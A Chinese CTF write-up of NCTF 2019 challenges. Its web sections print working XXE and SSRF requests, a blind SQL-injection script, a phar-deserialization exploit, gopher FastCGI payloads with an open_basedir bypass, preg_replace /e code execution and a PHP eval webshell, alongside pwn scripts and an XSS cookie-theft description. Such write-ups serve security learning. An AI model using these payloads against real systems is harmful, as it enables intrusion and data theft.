NCTF 游记
# NCTF 游记
# 0x00 前言
又是一场被大佬出的“入门新手基础水题”虐爆的比赛。。。。。。。
pwn2和流量分析做的心态爆炸。。。。导致正常比赛下来都没做出啥题(其实是菜。。。。。。
最终盗版战队止步前十。。。。天璇的其他大佬都好强啊!(群除我佬。。。。)
收货:
- XEE攻击基本方法
- linux 系统中一些敏感文件及其作用
- 利用PIL写绘图脚本
- chr().拼接字符串绕过引号限制
- Wireshark 基本过滤操作的语法
- SSRF 攻击
Todo:
- XXS 攻击的具体操作和原理
- PIE 保护情况下基址的泄露方法和64位按字节写入的操作。。。。。。。。
- 一堆pwn的知识点 rop heap........
- Crypto密码学相关知识 RSA AES.......
- 逆向patch.....
# 0x01 Fake XML cookbook
F12看了一眼发现
function doLogin(){
var username = $("#username").val();
var password = $("#password").val();
if(username == "" || password == ""){
alert("Please enter the username and password!");
return;
}
var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
$.ajax({
type: "POST",
url: "doLogin.php",
contentType: "application/xml;charset=utf-8",
data: data,
dataType: "xml",
anysc: false,
success: function (result) {
var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
if(code == "0"){
$(".msg").text(msg + " login fail!");
}else if(code == "1"){
$(".msg").text(msg + " login success!");
}else{
$(".msg").text("error:" + msg);
}
},
error: function (XMLHttpRequest,textStatus,errorThrown) {
$(".msg").text(errorThrown + ':' + textStatus);
}
});
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
用XML和服务器通讯,联想到XXE攻击
burp抓post包得到
POST /doLogin.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40002
Content-Length: 207
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://nctf2019.x1ct34m.com:40002
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
DNT: 1
Content-Type: application/xml;charset=UTF-8
Referer: http://nctf2019.x1ct34m.com:40003/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
<user><username>admin</username><password>123</password></user>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
根据js脚本可以发现username是可以回显的
然后构造一下exp
POST /doLogin.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40002
Content-Length: 207
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://nctf2019.x1ct34m.com:40002
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
DNT: 1
Content-Type: application/xml;charset=UTF-8
Referer: http://nctf2019.x1ct34m.com:40003/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
]>
<user><username>&xxe;</username><password>123</password></user>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# 0x02 True XML cookbook
相当于第一题的加强版本
现在/flag里东西没了
看题目描述一开始以为要用上phar之类的骚操作,但是没有其他上传点了
fuzz读了一下 /var/www/html/doLogin.php
倒是有admin的密码了。。。
但是没啥用
读了/bin/sh 居然是有的。。。。
再读了读/etc/hosts 和/proc/net/arp
内网ip泄露
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.18.0.2 3b6bacb4719b
1
2
3
4
5
6
7
2
3
4
5
6
7
IP address HW type Flags HW address Mask Device
192.168.1.40 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.75 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.55 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.16 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.63 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.249 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.24 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.39 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.70 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.47 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.8 0x1 0x2 02:42:c0:a8:01:08 * eth0
192.168.1.244 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.23 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.50 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.252 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.31 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.58 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.69 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.7 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.34 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.77 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.15 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.42 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.49 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.243 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.18 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.57 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.251 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.26 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.33 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.64 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.2 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.41 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.72 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.10 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.52 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.246 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.17 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.60 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.254 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.25 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.36 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.71 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.1 0x1 0x2 02:42:ea:57:7a:1c * eth0
192.168.1.44 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.9 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.245 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.20 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.51 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.253 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.28 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.59 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.4 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.35 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.66 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.12 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.43 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.74 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.54 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.19 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.62 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.248 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.27 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.38 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.65 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.3 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.46 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.73 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.11 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.53 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.247 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.22 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.61 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.30 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.37 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.68 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.6 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.45 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.76 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.14 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.21 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.48 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.242 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.29 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.56 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.250 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.5 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.32 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.67 0x1 0x0 00:00:00:00:00:00 * eth0
192.168.1.13 0x1 0x0 00:00:00:00:00:00 * eth0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
SSRF Burp Suite Introuder 爆破
192.168.1.8出了flag.....
POST /doLogin.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40003
Content-Length: 220
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://nctf2019.x1ct34m.com:40003
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
DNT: 1
Content-Type: application/xml;charset=UTF-8
Referer: http://nctf2019.x1ct34m.com:40003/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://192.168.1.8">
]>
<user><username>&xxe;</username><password>123</password></user>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# 0x03 SQLi (赛后复现)
直接给了sql语句
select * from users where username='' and passwd=''
1
但是过滤了一堆select . or ' like基本都过滤了
然后这里的bypass技巧是
单引号可以使用
\来转义绕过,or可以采用||=可以采用regexp,#可以用``\x00`替代
然后基本上么得跨表查询,就只能盲注爆破password了
exp 核心代码部分
def boolequ(start,end):
ret=""
for i in range(start,end):
for ch in pt:
payload="""||passwd/**/REGEXP/**/"^{}";\x00""".format(ret+ch)
data = {
"username":'\\',
"passwd":payload
}
#print data
req=requests.post(url,data=data,allow_redirects=False)
if req.status_code!=200 and req.status_code!=302:
continue
if req.status_code==302:
ret=ret+ch
sys.stdout.write("[-]Result : -> {0} <-\r".format(ret))
sys.stdout.flush()
break
print("[+]Result : ->"+ret+"<-")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 0x04 phar matches everything (赛后复现)
...原题可以拿到源码,但似乎buuoj上不行
能拿到的源码是cathmine.php
<?php
class Easytest{
protected $test;
public function funny_get(){
return $this->test;
}
}
class Main {
public $url;
public function curl($url){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$output=curl_exec($ch);
curl_close($ch);
return $output;
}
public function __destruct(){
$this_is_a_easy_test=unserialize($_GET['careful']);
if($this_is_a_easy_test->funny_get() === '1'){
echo $this->curl($this->url);
}
}
}
if(isset($_POST["submit"])) {
$check = getimagesize($_POST['name']);
if($check !== false) {
echo "File is an image - " . $check["mime"] . ".";
} else {
echo "File is not an image.";
}
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
这里藏了一个ssrf 但是不能直接用这个php打,因为url不可控
判断文件类型使用了getimageinfo,所以可以搞phar的反序列化,这里很明显要我们SSRF,首先读下file:///proc/net/arp
Exp
<?php
class Easytest{
protected $test='1';
public function funny_get(){
return $this->test;
}
}
class Main {
public $url;
}
$test = new EasyTest;
echo urlencode(serialize($test))."\n";
$payload = new Main;
$payload->url = "file:///proc/net/arp";
$png_header = hex2bin('89504e470d0a1a0a0000000d49484452000000400000004000');
$phar = new Phar('exp.phar');
$phar -> startBuffering();
$phar -> setStub($png_header.'<?php __HALT_COMPILER();?>'); //设置 stub,增加 gif 文件头
$phar -> addFromString('test.txt','test'); //添加要压缩的文件
$phar -> setMetadata($payload); //将自定义 meta-data 存入 manifest
$phar -> stopBuffering();
rename("exp.phar","exp.png");
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
拿到
IP address HW type Flags HW address Mask Device
173.236.149.2 0x1 0x2 02:42:ad:ec:95:02 * eth0
1
2
2
/etc/host
拿到
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
173.236.149.9 osrc
1
2
3
4
5
6
7
2
3
4
5
6
7
但是都么得回显,后来发现是173.236.149.10这个(估计是buuoj的镜像问题
然后访问一下显示
这里用evoa师傅的脚本打
python gopher.srff.exp.py -c "<?php phpinfo();?>" 173.236.149.10 /var/www/html/index.php
gopher://127.0.0.1:9000/_%01%01%005%00%08%00%00%00%01%00%00%00%00%00%00%01%04%005%01%DB%00%00%0E%02CONTENT_LENGTH18%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%005%00%00%00%00%01%05%005%00%12%00%00%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%01%05%005%00%00%00%00
1
2
2
替换成
gopher://173.236.149.10:9000/_%01%01%005%00%08%00%00%00%01%00%00%00%00%00%00%01%04%005%01%DB%00%00%0E%02CONTENT_LENGTH18%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04%005%00%00%00%00%01%05%005%00%12%00%00%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%01%05%005%00%00%00%00
1
可以看到有open_basedir /var/www/html:/tmp
用一个经典的绕过方式
mkdir('eki');chdir('eki');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));
1
python gopher.srff.exp.py -c "<?php mkdir('eki');chdir('eki');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));?>" 173.236.149.10 /var/www/html/index.php
gopher://127.0.0.1:9000/_%01%01z%BF%00%08%00%00%00%01%00%00%00%00%00%00%01%04z%BF%01%DC%00%00%0E%03CONTENT_LENGTH171%0C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_INTERFACEFastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%17SCRIPT_FILENAME/var/www/html/index.php%0B%17SCRIPT_NAME/var/www/html/index.php%09%1FPHP_VALUEauto_prepend_file%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%17REQUEST_URI/var/www/html/index.php%01%04z%BF%00%00%00%00%01%05z%BF%00%AB%00%00%3C%3Fphp%20mkdir%28%27eki%27%29%3Bchdir%28%27eki%27%29%3Bini_set%28%27open_basedir%27%2C%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bchdir%28%27..%27%29%3Bini_set%28%27open_basedir%27%2C%27/%27%29%3Becho%28file_get_contents%28%27flag%27%29%29%3B%3F%3E%01%05z%BF%00%00%00%00`
1
2
3
2
3
# 0x05 easyphp
大佬队友带我躺赢。。。。。
# 0x06 replace
填三个"#"报错
Parse error: syntax error, unexpected end of file in /var/www/html/index.php(70) : regexp code on line 1
Fatal error: preg_replace(): Failed evaluating code: # in /var/www/html/index.php on line 70
1
2
3
2
3
实现功能使用的是preg_match()
题目提示用了php5.6
想到preg_match() /e参数
试一下可以执行phpinfo()
POST /index.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: http://nctf2019.x1ct34m.com:40006
Connection: close
Referer: http://nctf2019.x1ct34m.com:40006/index.php
Cookie: PHPSESSID=6vtpnnca8f9mjjde768sqiub4g
Upgrade-Insecure-Requests: 1
sub=text&pat=e&rep=phpinfo();
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
但是直接用readfile('/flag')读文件,发现单引号双引号被拦截
于是用chr()拼接表示字符串。。。。。
POST /index.php HTTP/1.1
Host: nctf2019.x1ct34m.com:40006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: http://nctf2019.x1ct34m.com:40006
Connection: close
Referer: http://nctf2019.x1ct34m.com:40006/index.php
Cookie: PHPSESSID=6vtpnnca8f9mjjde768sqiub4g
Upgrade-Insecure-Requests: 1
sub=text&pat=e&rep=readfile(chr(47).chr(102).chr(108).chr(97).chr(103));
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 0x07 flask
大佬队员,躺赢。。。。。
# 0x08 Upload your Shell
翻了一下网页就只有
index.php?action=imgs.html
1
有注入点 然后想着上传一个图片马 直接写一句话改后缀名不行 看起来他是要读文件头的 并且拦截了<?(有时候正常的图片文件都会有。。。。。) 考虑php的第三种写法
<script language="php">
@eval($_POST[a]);
</script>
1
2
3
2
3
刚准备用菜刀的结果告诉我一个服务器上自带的图片马的地址 用自带的action参数解析成php就完事了 payload:
/index.php?action=/var/www/html/upload-imgs/321fab94ed3f1e1fba698ddda303566a/Th1s_is_a_fl4g.jpg
1
# 0x09 flask_website
大佬队友带我躺赢。。。。。
# 0x0A simple_xss
据队友说是个入门向xss
在http://xsspt.com/生成一段xss 发给admin
过一会就会得到admin的cookie
然后就能拿到flag......
# 0x0B hacker_backdoor
大佬队友带我躺赢。。。。。+2
# 0x0C tsb
tsb->bst .....
# 0x0D 难看的代码
大佬队友带我躺赢。。。。。+3
# 0x0E 签到题
大佬队友带我躺赢。。。。。+4
# 0x0F DEBUG
真就IDA 动态调试。。。。。
因为
for ( i = 0; i <= 23; ++i )
{
if ( v7[i] != *(&s + i) )
{
printf("GG");
exit(0);
}
}
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
进循环时s就计算好了
然后下个断点直接看栈就好了
# 0x10 Our 16bit Games
大佬队友带我躺赢。。。。。+5
# 0x11 Easy Ternary
大佬队友带我躺赢。。。。。+6
# 0x12 你大概需要一个带bar的mac
无设备引起不适。。。
过
# 0x13 math_easy
math.....easy?...... 过.......
# 0x14 hello_pwn
nc 题。。。。。
#coding=utf-8
from pwn import *
io=remote("139.129.76.65","50003")
io.interactive()
1
2
3
4
2
3
4
# 0x15 pwn me 100 years! (I)
checksec 看一下
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
1
2
3
4
5
2
3
4
5
没开Canary和PIE,
要满足两个条件
直接栈溢出就完事了
#coding=utf-8
from pwn import *
payload="yes\x00"+'a'*(0x10-0x4)+p64(0x66666666)
io=remote("139.129.76.65","50004")
io.sendafter("ready?\n",payload)
io.interactive()
1
2
3
4
5
6
2
3
4
5
6
# 0x16 pwn me 100 years! (II)
漏洞:栈上变量未初始化导致第一个函数里的buf就是第二个函数的&dest
然后可以用第二个函数的printf格式化漏洞
但是checksec告诉我们
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
1
2
3
4
5
2
3
4
5
开了PIE....
还得泄露基址。。
最后没能整出来,还是要好好学。。。。。
# 0x17 ~ 0x1C(pwn)
0x17没做出来,心态爆炸。。。。。
# 0x1D Keyboard
九宫格输入法。。。。。。
好像把所有不一样的表示换成不同字幕跑quipquip也能过。。。。。
# 0x1E~0x21 (Crypto)
我,数学学术垃圾,过.......
# 0x22 a_good_idea
foremost+stegsolve(image Combiner)
得到一张二维码,扫描得到flag
# 0x23 Become a Rockstar
看文风有点奇怪。。。。像是编程语言。。。
搜了一下有没有诗歌一样的编程语言
发现Rockstar语言
用Rockstar-js 没跑出来暂时放弃了
结果Rockstar-py可以跑出来
Leonard_Adleman = "star"
Problem_Makers = 76
Problem_Makers = "NCTF{"
def God(World):
a_boy = "flag"
the_boy = 3
def Evil(your_mind):
a_girl = "no flag"
the_girl = 5
Truths = 3694
Bob = "ar"
Adi_Shamir = "rock"
def Love(Alice, Bob):
Mallory = 13
Mallory = 24
Everything = 114514
Alice = "you"
def Reality(God, Evil):
God = 26
Evil = 235
Ron_Rivest = "nice"
def You_Want_To(Alice, Love, Anything):
You = 5.75428
your_heart = input()
You = 5
your_mind = input()
Nothing = 31
if Truths * Nothing == Everything:
RSA = Ron_Rivest + Adi_Shamir + Leonard_Adleman
if Everything / Nothing == Truths:
Problem_Makers = Problem_Makers + Alice + Bob
print(Problem_Makers)
the_flag = 245
the_confusion = 244
print(RSA)
Mysterious_One = "}"
print(Mysterious_One)
This = 4
This = 35
This = 7
This = 3
This = 3
This = 37
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# 0x24 Bright Body I
虚幻引擎好游戏啊!(然而手残。。。。。
巅峰极客Nijia留下的心理阴影
以为要用逆向代码啥的
结果最后是在pak里直接strings就能出来的题目。。。。。
strings /mnt/c/Users/Eki/Desktop/Bright\ Body\ I/Bright\ Body\ I/Magic/Content/Paks/Magic-WindowsNoEditor.pak |grep NCTF*
1
# 0x25 有内鬼,终止交易
一个ss协议流量分析题
一、针对wireshark最常用的自然是针对IP地址的过滤。其中有几种情况:
表达式为:ip.src == 192.168.0.1
(2)对目的地址为192.168.0.1的包的过滤,即抓取目的地址满足要求的包。
表达式为:ip.dst == 192.168.0.1
(3)对源或者目的地址为192.168.0.1的包的过滤,即抓取满足源或者目的地址的ip地址是192.168.0.1的包。
表达式为:ip.addr == 192.168.0.1,或者 ip.src == 192.168.0.1 or ip.dst == 192.168.0.1
(4)要排除以上的数据包,我们只需要将其用括号囊括,然后使用 "!" 即可。
表达式为:!(表达式)
二、针对协议的过滤
(1)仅仅需要捕获某种协议的数据包,表达式很简单仅仅需要把协议的名字输入即可。
表达式为:http
(2)需要捕获多种协议的数据包,也只需对协议进行逻辑组合即可。
表达式为:http or telnet (多种协议加上逻辑符号的组合即可)
(3)排除某种协议的数据包
表达式为:not arp !tcp
三、针对端口的过滤(视协议而定)
(1)捕获某一端口的数据包
表达式为:tcp.port == 80
(2)捕获多端口的数据包,可以使用and来连接,下面是捕获高端口的表达式
表达式为:udp.port >= 2048
四、针对长度和内容的过滤
(1)针对长度的过虑(这里的长度指定的是数据段的长度)
表达式为:udp.length < 30 http.content_length <=20
(2)针对数据包内容的过滤
表达式为:http.request.uri matches "vipscu" (匹配http请求中含有vipscu字段的请求信息)
config.json泄露了加密方法、密钥和主机地址
用ss的源码里的脚本直接跑解密
人肉分析了半个下午,心态爆炸。。。。。
分析不出来,
由于客户端和服务端发送包都经过了加密,不能整个导出进行解密,需分开解密
......
最后找到是在这个TCP包里。。。
# 0x26 小狗的秘密
流量分析套路题
用Wireshark导出HTTP对象
最大的一个1.html里有很奇妙的东西类似
(255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255).....
1
